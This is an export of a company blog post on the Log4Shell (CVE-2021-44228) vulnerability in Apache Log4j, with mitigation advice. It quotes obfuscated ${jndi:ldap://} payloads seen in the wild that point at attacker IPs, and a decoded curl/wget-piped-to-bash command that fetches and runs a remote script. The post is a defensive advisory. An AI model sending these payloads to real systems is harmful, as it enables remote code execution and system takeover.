{"id":2702,"date":"2021-12-27T12:59:31","date_gmt":"2021-12-27T07:29:31","guid":{"rendered":"https:\/\/www.urolime.com\/blogs\/ae\/?p=2702"},"modified":"2021-12-27T12:59:31","modified_gmt":"2021-12-27T07:29:31","slug":"actively-exploited-log4j-may-be-the-worst-software-vulnerability","status":"publish","type":"post","link":"https:\/\/www.urolime.com\/blogs\/ae\/actively-exploited-log4j-may-be-the-worst-software-vulnerability\/","title":{"rendered":"Actively Exploited Log4j May Be The Worst Software Vulnerability"},"content":{"rendered":"<p><span style=\"font-weight: 400;\">Last week, Information Security Media announced that it discovered the critical vulnerability CVE-2021-44228 in the Apache Log4j library (CVSS severity 10\/10). This threat, also known as Log4Shell or LogJam, is a vulnerability of the Remote Code Execution (RCE) class. An attacker who successfully exploited this vulnerability on a vulnerable server could execute arbitrary code and gain complete control over the system. It is dangerous because of the published proof-of-concept and easy-to-use vulnerabilities.<\/span><\/p>\n<p><strong>CVE-2021-44228 Technical details<\/strong><\/p>\n<p><span style=\"font-weight: 400;\">CVE-2021-44228 Vulnerability remote code execution found in the Apache Log4j library- a part of the Apache Logging project. The vulnerability is likely to be exploited when a product uses a vulnerable version of this library with a JNDI module for logging purposes. Almost all versions of Log4j are vulnerable from 2.0-beta9 to 2.14.1.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Log4j contains a search mechanism to perform queries using special string format syntax. It means that different parameters can be queried, for example, the version of the Java environment via $ {java: version}. Then enter the JNDI key in the string, and the search engine will use the JNDI API. By default, all requests are made with the prefix java: comp \/ env \/. However, the author implemented the ability to use a custom prefix with the colon for the keys. Here are the weak points. If jndi:ldap:\/\/is used as the key the request goes to the specified LDAP server. Other communication protocols such as LDAPS, DNS, and RMI are also used.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Security experts successfully monitored telemetry for activity exploiting vulnerability CVE-2021-44228 and extracted the URL used by the attacker. Important examples are below.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">${jndi%3aldap%3a\/\/0ky8rj5089x9qx7tq8djb3rpp.canarytokens[.]com\/a}<\/span><\/p>\n<p><span style=\"font-weight: 400;\">${jndi:${lower:l}${lower:d}${lower:a}${lower:p}:\/\/${hostName:user:env}.c6340b92vtc00002scfggdpcz9eyyyyyd.interactsh[.]com}<\/span><\/p>\n<p><span style=\"font-weight: 400;\">${jndi:${lower:l}${lower:d}${lower:a}${lower:p}:\/\/195.54.160[.]149:12344\/Basic\/Command\/Base64\/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC80NS41Ni45Mi4yMjk6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNDUuNTYuOTIuMjI5OjgwKXxiYXNo}<\/span><\/p>\n<p><span style=\"font-weight: 400;\">${jndi:ldap:\/\/5819.u837r4g5oolsy8hudoz24c15nwtohd.burpcollaborator[.]net\/a}<\/span><\/p>\n<p><span style=\"font-weight: 400;\">${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}\/\/62.182.80.168:1389\/pien3m}<\/span><\/p>\n<p><span style=\"font-weight: 400;\">${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:l}${lower:d}${lower:a}${lower:p}}:\/\/67.205.191.102:1389\/koejir}}<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Based on the URL analysis they found how attackers attempted to embed payloads in rare fields such as; user agents, data fields, and URI parameters. Uploading into this box is an evasive technique that bypasses the simple lockdown measures that many organizations use to protect themself against this type of attack.<\/span><\/p>\n<p><strong>The following excerpt shows an exploitation attempt in HTTP server logs:<\/strong><\/p>\n<p><span style=\"font-weight: 400;\">45.155.205[.]233:53590 server:80 &#8211; [10\/Dec\/2021:13:25:10 +0000] &#8220;GET \/ HTTP\/1.1&#8221; 200 1671 &#8220;-&#8220;${jndi:ldap:\/\/45.155.205[.]233:12344\/Basic\/Command\/Base64\/[BASE64-code-removed]}&#8221;<\/span><\/p>\n<p><span style=\"font-weight: 400;\">The Base64 string in the above query is translated to:<\/span><\/p>\n<p><span style=\"font-weight: 400;\">(curl -s 45.155.xxx.xxx:5874\/server:80||wget -q -O- 45.155.xxx.xxx:5874\/server:80) | bash<\/span><\/p>\n<p><span style=\"font-weight: 400;\">This code takes the malicious script from 45.155.xxx.xxx then runs it with bash.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Thus, the remote server controlled by the attacker can send objects back to the vulnerable server to execute arbitrary code on the system to reveal sensitive data. The attacker must send a special string through a mechanism that writes this string to a log file that is processed by the Log4j library. This can be done as a simple HTTP request sent through a web form, data field, etc., or some other way to interact with the server-side logging.<\/span><\/p>\n<p><strong>CVE-2021-44228 Operating statistics<\/strong><\/p>\n<p><span style=\"font-weight: 400;\">Honeypot data shows a total of 8,646 exploitation attempts between December 10 and 12 with 1,700 malicious requests per hour on December 11 at 12:00 GMT.<\/span><\/p>\n<p><strong>Impact<\/strong><\/p>\n<p><span style=\"font-weight: 400;\">The Log4j 2 library is widely used in Java enterprise software. This method of distribution makes it difficult to measure the effect. As with other high-profile vulnerabilities like Heartbleed and Shellshock, we believe more vulnerable products will be discovered in the coming weeks. To the best of our knowledge, at least the following software may be impacted:<\/span><\/p>\n<ul>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Spring-Boot-starter-log4j2<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Apache Dubbo<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Apache Struts<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Apache Solr<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Apache Druid<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Apache Flink<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">ElasticSearch<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Flume<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Logstash<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Kafka<\/span><\/li>\n<\/ul>\n<p><span style=\"font-weight: 400;\">Due to its ease of operation and long reach, it is suspected that ransomware attackers will soon exploit this vulnerability.<\/span><\/p>\n<p><strong>Suggestions<\/strong><\/p>\n<p><span style=\"font-weight: 400;\"><a href=\"https:\/\/www.urolime.com\/ae\/\">Urolime<\/a> encourages all organizations to adopt an aggressive mindset and to check relevant request logs for unusual activity.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">If a deviation is detected, we recommend that you assume that this is an active event and has been compromised and you should act accordingly.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Upgrading to Log4j 2 or a patched version of the affected program closes this vulnerability. Urolime recommends that you immediately update to a patched version if you think it may be affected.<\/span><\/p>\n<p><strong>The latest update from the Apache Log4j team recommends that businesses:<\/strong><\/p>\n<p><span style=\"font-weight: 400;\">Upgrade to Log4j 2.16.0 (2.15.0 is susceptible to exploitation in non-default configurations that utilize the ThreadContext class with user-supplied input.)<\/span><\/p>\n<p><span style=\"font-weight: 400;\">For those who cannot upgrade to 2.16.0, in releases &gt;=2.10, this vulnerability can be mitigated by setting either the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">For releases from 2.0-beta9 to 2.10.0, the mitigation is to remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org\/apache\/logging\/log4j\/core\/lookup\/JndiLookup.class.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">If patching is not possible, it is highly advised organizations apply the temporary mitigation below and monitor impacted applications closely for anomalous behavior.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">To mitigate the vulnerability, instead of updating Log4 2j, the following parameters should be set to true when starting the JVM (Java Virtual Machine):<\/span><\/p>\n<p><span style=\"font-weight: 400;\">log4j2.formatMsgNoLookups;<\/span><\/p>\n<p><span style=\"font-weight: 400;\">The presence of JAR files belonging to the log4j library can indicate an application is potentially susceptible to CVE-2021-44228. The specific files to search for should match the following pattern:<\/span><\/p>\n<p><span style=\"font-weight: 400;\">log4j-core-*.jar;<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Depending on the installation method, the location of an appropriate JAR file may also indicate a potentially vulnerable application. For example, if the file is in C:\\Program Files\\ApplicationName\\log4j-core-version.jar on Windows, it means the application name needs to be verified. On Linux, the lsof can display the processes that use the current JAR file and can be run using the following syntax:<\/span><\/p>\n<p><span style=\"font-weight: 400;\">lsof \/path\/to\/log4j-core-version.jar;<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Currently, the guidelines for recognizing regex signatures are too broad in public spaces and solutions have been developed to avoid them.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">\u00a0<\/span><\/p>\n<p><span style=\"font-weight: 400;\">\u00a0<\/span><\/p>\n<p>&nbsp;<\/p>\n<div class=\"pvc_clear\"><\/div>\n<p id=\"pvc_stats_2702\" class=\"pvc_stats all  \" data-element-id=\"2702\" style=\"\"><i class=\"pvc-stats-icon medium\" aria-hidden=\"true\"><svg aria-hidden=\"true\" focusable=\"false\" data-prefix=\"far\" data-icon=\"chart-bar\" role=\"img\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" viewBox=\"0 0 512 512\" class=\"svg-inline--fa fa-chart-bar fa-w-16 fa-2x\"><path fill=\"currentColor\" d=\"M396.8 352h22.4c6.4 0 12.8-6.4 12.8-12.8V108.8c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v230.4c0 6.4 6.4 12.8 12.8 12.8zm-192 0h22.4c6.4 0 12.8-6.4 12.8-12.8V140.8c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v198.4c0 6.4 6.4 12.8 12.8 12.8zm96 0h22.4c6.4 0 12.8-6.4 12.8-12.8V204.8c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v134.4c0 6.4 6.4 12.8 12.8 12.8zM496 400H48V80c0-8.84-7.16-16-16-16H16C7.16 64 0 71.16 0 80v336c0 17.67 14.33 32 32 32h464c8.84 0 16-7.16 16-16v-16c0-8.84-7.16-16-16-16zm-387.2-48h22.4c6.4 0 12.8-6.4 12.8-12.8v-70.4c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v70.4c0 6.4 6.4 12.8 12.8 12.8z\" class=\"\"><\/path><\/svg><\/i> <img loading=\"lazy\" decoding=\"async\" width=\"16\" height=\"16\" alt=\"Loading\" src=\"https:\/\/www.urolime.com\/blogs\/ae\/wp-content\/plugins\/page-views-count\/ajax-loader-2x.gif\" border=0 \/><\/p>\n<div class=\"pvc_clear\"><\/div>\n","protected":false},"excerpt":{"rendered":"<p>Last week, Information Security Media announced that it discovered the critical vulnerability CVE-2021-44228 in the Apache Log4j library (CVSS severity 10\/10). This threat, also known as Log4Shell or LogJam, is a vulnerability of the Remote Code Execution (RCE) class. An attacker who successfully exploited this vulnerability on a vulnerable server could execute arbitrary code and [&hellip;]<\/p>\n<div class=\"pvc_clear\"><\/div>\n<p id=\"pvc_stats_2702\" class=\"pvc_stats all  \" data-element-id=\"2702\" style=\"\"><i class=\"pvc-stats-icon medium\" aria-hidden=\"true\"><svg aria-hidden=\"true\" focusable=\"false\" data-prefix=\"far\" data-icon=\"chart-bar\" role=\"img\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" viewBox=\"0 0 512 512\" class=\"svg-inline--fa fa-chart-bar fa-w-16 fa-2x\"><path fill=\"currentColor\" d=\"M396.8 352h22.4c6.4 0 12.8-6.4 12.8-12.8V108.8c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v230.4c0 6.4 6.4 12.8 12.8 12.8zm-192 0h22.4c6.4 0 12.8-6.4 12.8-12.8V140.8c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v198.4c0 6.4 6.4 12.8 12.8 12.8zm96 0h22.4c6.4 0 12.8-6.4 12.8-12.8V204.8c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v134.4c0 6.4 6.4 12.8 12.8 12.8zM496 400H48V80c0-8.84-7.16-16-16-16H16C7.16 64 0 71.16 0 80v336c0 17.67 14.33 32 32 32h464c8.84 0 16-7.16 16-16v-16c0-8.84-7.16-16-16-16zm-387.2-48h22.4c6.4 0 12.8-6.4 12.8-12.8v-70.4c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v70.4c0 6.4 6.4 12.8 12.8 12.8z\" class=\"\"><\/path><\/svg><\/i> <img loading=\"lazy\" decoding=\"async\" width=\"16\" height=\"16\" alt=\"Loading\" src=\"https:\/\/www.urolime.com\/blogs\/ae\/wp-content\/plugins\/page-views-count\/ajax-loader-2x.gif\" border=0 \/><\/p>\n<div class=\"pvc_clear\"><\/div>\n","protected":false},"author":1,"featured_media":2705,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"content-type":"","sfsi_plus_gutenberg_text_before_share":"","sfsi_plus_gutenberg_show_text_before_share":"","sfsi_plus_gutenberg_icon_type":"","sfsi_plus_gutenberg_icon_alignemt":"","sfsi_plus_gutenburg_max_per_row":"","footnotes":""},"categories":[1205],"tags":[],"class_list":["post-2702","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-news"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v25.3.1 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Actively Exploited Log4j May Be The Worst Software Vulnerability - Urolime Blogs<\/title>\n<meta name=\"description\" content=\"An attacker who successfully exploited Log4Shell vulnerability on a vulnerable server could execute arbitrary code and gain complete control over the system.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.urolime.com\/blogs\/ae\/actively-exploited-log4j-may-be-the-worst-software-vulnerability\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Actively Exploited Log4j May Be The Worst Software Vulnerability - Urolime Blogs\" \/>\n<meta property=\"og:description\" content=\"An attacker who successfully exploited Log4Shell vulnerability on a vulnerable server could execute arbitrary code and gain complete control over the system.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.urolime.com\/blogs\/ae\/actively-exploited-log4j-may-be-the-worst-software-vulnerability\/\" \/>\n<meta property=\"og:site_name\" content=\"Urolime Blogs\" \/>\n<meta property=\"article:published_time\" content=\"2021-12-27T07:29:31+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.urolime.com\/blogs\/ae\/wp-content\/uploads\/sites\/7\/2021\/12\/Actively-Exploited-Log4j-May-Be-The-Worst-Software-Vulnerability.png\" \/>\n\t<meta property=\"og:image:width\" content=\"768\" \/>\n\t<meta property=\"og:image:height\" content=\"432\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Urolime Technologies\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Urolime Technologies\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.urolime.com\/blogs\/ae\/actively-exploited-log4j-may-be-the-worst-software-vulnerability\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.urolime.com\/blogs\/ae\/actively-exploited-log4j-may-be-the-worst-software-vulnerability\/\"},\"author\":{\"name\":\"Urolime Technologies\",\"@id\":\"https:\/\/www.urolime.com\/blogs\/ae\/#\/schema\/person\/c231f59d5f2c2516e0efc6067ee0c22c\"},\"headline\":\"Actively Exploited Log4j May Be The Worst Software Vulnerability\",\"datePublished\":\"2021-12-27T07:29:31+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.urolime.com\/blogs\/ae\/actively-exploited-log4j-may-be-the-worst-software-vulnerability\/\"},\"wordCount\":1053,\"publisher\":{\"@id\":\"https:\/\/www.urolime.com\/blogs\/ae\/#organization\"},\"image\":{\"@id\":\"https:\/\/www.urolime.com\/blogs\/ae\/actively-exploited-log4j-may-be-the-worst-software-vulnerability\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.urolime.com\/blogs\/ae\/wp-content\/uploads\/sites\/7\/2021\/12\/Actively-Exploited-Log4j-May-Be-The-Worst-Software-Vulnerability.png\",\"articleSection\":[\"News\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.urolime.com\/blogs\/ae\/actively-exploited-log4j-may-be-the-worst-software-vulnerability\/\",\"url\":\"https:\/\/www.urolime.com\/blogs\/ae\/actively-exploited-log4j-may-be-the-worst-software-vulnerability\/\",\"name\":\"Actively Exploited Log4j May Be The Worst Software Vulnerability - Urolime Blogs\",\"isPartOf\":{\"@id\":\"https:\/\/www.urolime.com\/blogs\/ae\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.urolime.com\/blogs\/ae\/actively-exploited-log4j-may-be-the-worst-software-vulnerability\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.urolime.com\/blogs\/ae\/actively-exploited-log4j-may-be-the-worst-software-vulnerability\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.urolime.com\/blogs\/ae\/wp-content\/uploads\/sites\/7\/2021\/12\/Actively-Exploited-Log4j-May-Be-The-Worst-Software-Vulnerability.png\",\"datePublished\":\"2021-12-27T07:29:31+00:00\",\"description\":\"An attacker who successfully exploited Log4Shell vulnerability on a vulnerable server could execute arbitrary code and gain complete control over the system.\",\"breadcrumb\":{\"@id\":\"https:\/\/www.urolime.com\/blogs\/ae\/actively-exploited-log4j-may-be-the-worst-software-vulnerability\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.urolime.com\/blogs\/ae\/actively-exploited-log4j-may-be-the-worst-software-vulnerability\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.urolime.com\/blogs\/ae\/actively-exploited-log4j-may-be-the-worst-software-vulnerability\/#primaryimage\",\"url\":\"https:\/\/www.urolime.com\/blogs\/ae\/wp-content\/uploads\/sites\/7\/2021\/12\/Actively-Exploited-Log4j-May-Be-The-Worst-Software-Vulnerability.png\",\"contentUrl\":\"https:\/\/www.urolime.com\/blogs\/ae\/wp-content\/uploads\/sites\/7\/2021\/12\/Actively-Exploited-Log4j-May-Be-The-Worst-Software-Vulnerability.png\",\"width\":768,\"height\":432,\"caption\":\"Actively Exploited Log4j May Be The Worst Software Vulnerability\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.urolime.com\/blogs\/ae\/actively-exploited-log4j-may-be-the-worst-software-vulnerability\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/www.urolime.com\/blogs\/ae\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Actively Exploited Log4j May Be The Worst Software Vulnerability\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.urolime.com\/blogs\/ae\/#website\",\"url\":\"https:\/\/www.urolime.com\/blogs\/ae\/\",\"name\":\"Urolime Blogs\",\"description\":\"The place for DevOps, Cloud, Kubernetes News and Updates\",\"publisher\":{\"@id\":\"https:\/\/www.urolime.com\/blogs\/ae\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.urolime.com\/blogs\/ae\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.urolime.com\/blogs\/ae\/#organization\",\"name\":\"Urolime Blogs\",\"url\":\"https:\/\/www.urolime.com\/blogs\/ae\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.urolime.com\/blogs\/ae\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.urolime.com\/blogs\/ae\/wp-content\/uploads\/sites\/7\/2021\/06\/cropped-250-x250.jpg\",\"contentUrl\":\"https:\/\/www.urolime.com\/blogs\/ae\/wp-content\/uploads\/sites\/7\/2021\/06\/cropped-250-x250.jpg\",\"width\":250,\"height\":73,\"caption\":\"Urolime Blogs\"},\"image\":{\"@id\":\"https:\/\/www.urolime.com\/blogs\/ae\/#\/schema\/logo\/image\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.urolime.com\/blogs\/ae\/#\/schema\/person\/c231f59d5f2c2516e0efc6067ee0c22c\",\"name\":\"Urolime Technologies\",\"description\":\"Urolime Technologies has made groundbreaking accomplishments in the field of Google Cloud &amp; Kubernetes Consulting, DevOps Services, 24\/7 Managed Services &amp; Support, Dedicated IT Team, Managed AWS Consulting and Azure Cloud Consulting. We believe our customers are Smart to choose their IT Partner, and we \u201cDo IT Smart\u201d.\",\"sameAs\":[\"https:\/\/www.urolime.com\/\"],\"url\":\"https:\/\/www.urolime.com\/blogs\/ae\/author\/blogadmin\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Actively Exploited Log4j May Be The Worst Software Vulnerability - Urolime Blogs","description":"An attacker who successfully exploited Log4Shell vulnerability on a vulnerable server could execute arbitrary code and gain complete control over the system.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.urolime.com\/blogs\/ae\/actively-exploited-log4j-may-be-the-worst-software-vulnerability\/","og_locale":"en_US","og_type":"article","og_title":"Actively Exploited Log4j May Be The Worst Software Vulnerability - Urolime Blogs","og_description":"An attacker who successfully exploited Log4Shell vulnerability on a vulnerable server could execute arbitrary code and gain complete control over the system.","og_url":"https:\/\/www.urolime.com\/blogs\/ae\/actively-exploited-log4j-may-be-the-worst-software-vulnerability\/","og_site_name":"Urolime Blogs","article_published_time":"2021-12-27T07:29:31+00:00","og_image":[{"width":768,"height":432,"url":"https:\/\/www.urolime.com\/blogs\/ae\/wp-content\/uploads\/sites\/7\/2021\/12\/Actively-Exploited-Log4j-May-Be-The-Worst-Software-Vulnerability.png","type":"image\/png"}],"author":"Urolime Technologies","twitter_card":"summary_large_image","twitter_misc":{"Written by":"Urolime Technologies","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.urolime.com\/blogs\/ae\/actively-exploited-log4j-may-be-the-worst-software-vulnerability\/#article","isPartOf":{"@id":"https:\/\/www.urolime.com\/blogs\/ae\/actively-exploited-log4j-may-be-the-worst-software-vulnerability\/"},"author":{"name":"Urolime Technologies","@id":"https:\/\/www.urolime.com\/blogs\/ae\/#\/schema\/person\/c231f59d5f2c2516e0efc6067ee0c22c"},"headline":"Actively Exploited Log4j May Be The Worst Software Vulnerability","datePublished":"2021-12-27T07:29:31+00:00","mainEntityOfPage":{"@id":"https:\/\/www.urolime.com\/blogs\/ae\/actively-exploited-log4j-may-be-the-worst-software-vulnerability\/"},"wordCount":1053,"publisher":{"@id":"https:\/\/www.urolime.com\/blogs\/ae\/#organization"},"image":{"@id":"https:\/\/www.urolime.com\/blogs\/ae\/actively-exploited-log4j-may-be-the-worst-software-vulnerability\/#primaryimage"},"thumbnailUrl":"https:\/\/www.urolime.com\/blogs\/ae\/wp-content\/uploads\/sites\/7\/2021\/12\/Actively-Exploited-Log4j-May-Be-The-Worst-Software-Vulnerability.png","articleSection":["News"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.urolime.com\/blogs\/ae\/actively-exploited-log4j-may-be-the-worst-software-vulnerability\/","url":"https:\/\/www.urolime.com\/blogs\/ae\/actively-exploited-log4j-may-be-the-worst-software-vulnerability\/","name":"Actively Exploited Log4j May Be The Worst Software Vulnerability - Urolime Blogs","isPartOf":{"@id":"https:\/\/www.urolime.com\/blogs\/ae\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.urolime.com\/blogs\/ae\/actively-exploited-log4j-may-be-the-worst-software-vulnerability\/#primaryimage"},"image":{"@id":"https:\/\/www.urolime.com\/blogs\/ae\/actively-exploited-log4j-may-be-the-worst-software-vulnerability\/#primaryimage"},"thumbnailUrl":"https:\/\/www.urolime.com\/blogs\/ae\/wp-content\/uploads\/sites\/7\/2021\/12\/Actively-Exploited-Log4j-May-Be-The-Worst-Software-Vulnerability.png","datePublished":"2021-12-27T07:29:31+00:00","description":"An attacker who successfully exploited Log4Shell vulnerability on a vulnerable server could execute arbitrary code and gain complete control over the system.","breadcrumb":{"@id":"https:\/\/www.urolime.com\/blogs\/ae\/actively-exploited-log4j-may-be-the-worst-software-vulnerability\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.urolime.com\/blogs\/ae\/actively-exploited-log4j-may-be-the-worst-software-vulnerability\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.urolime.com\/blogs\/ae\/actively-exploited-log4j-may-be-the-worst-software-vulnerability\/#primaryimage","url":"https:\/\/www.urolime.com\/blogs\/ae\/wp-content\/uploads\/sites\/7\/2021\/12\/Actively-Exploited-Log4j-May-Be-The-Worst-Software-Vulnerability.png","contentUrl":"https:\/\/www.urolime.com\/blogs\/ae\/wp-content\/uploads\/sites\/7\/2021\/12\/Actively-Exploited-Log4j-May-Be-The-Worst-Software-Vulnerability.png","width":768,"height":432,"caption":"Actively Exploited Log4j May Be The Worst Software Vulnerability"},{"@type":"BreadcrumbList","@id":"https:\/\/www.urolime.com\/blogs\/ae\/actively-exploited-log4j-may-be-the-worst-software-vulnerability\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.urolime.com\/blogs\/ae\/"},{"@type":"ListItem","position":2,"name":"Actively Exploited Log4j May Be The Worst Software Vulnerability"}]},{"@type":"WebSite","@id":"https:\/\/www.urolime.com\/blogs\/ae\/#website","url":"https:\/\/www.urolime.com\/blogs\/ae\/","name":"Urolime Blogs","description":"The place for DevOps, Cloud, Kubernetes News and Updates","publisher":{"@id":"https:\/\/www.urolime.com\/blogs\/ae\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.urolime.com\/blogs\/ae\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.urolime.com\/blogs\/ae\/#organization","name":"Urolime Blogs","url":"https:\/\/www.urolime.com\/blogs\/ae\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.urolime.com\/blogs\/ae\/#\/schema\/logo\/image\/","url":"https:\/\/www.urolime.com\/blogs\/ae\/wp-content\/uploads\/sites\/7\/2021\/06\/cropped-250-x250.jpg","contentUrl":"https:\/\/www.urolime.com\/blogs\/ae\/wp-content\/uploads\/sites\/7\/2021\/06\/cropped-250-x250.jpg","width":250,"height":73,"caption":"Urolime Blogs"},"image":{"@id":"https:\/\/www.urolime.com\/blogs\/ae\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/www.urolime.com\/blogs\/ae\/#\/schema\/person\/c231f59d5f2c2516e0efc6067ee0c22c","name":"Urolime Technologies","description":"Urolime Technologies has made groundbreaking accomplishments in the field of Google Cloud &amp; Kubernetes Consulting, DevOps Services, 24\/7 Managed Services &amp; Support, Dedicated IT Team, Managed AWS Consulting and Azure Cloud Consulting. We believe our customers are Smart to choose their IT Partner, and we \u201cDo IT 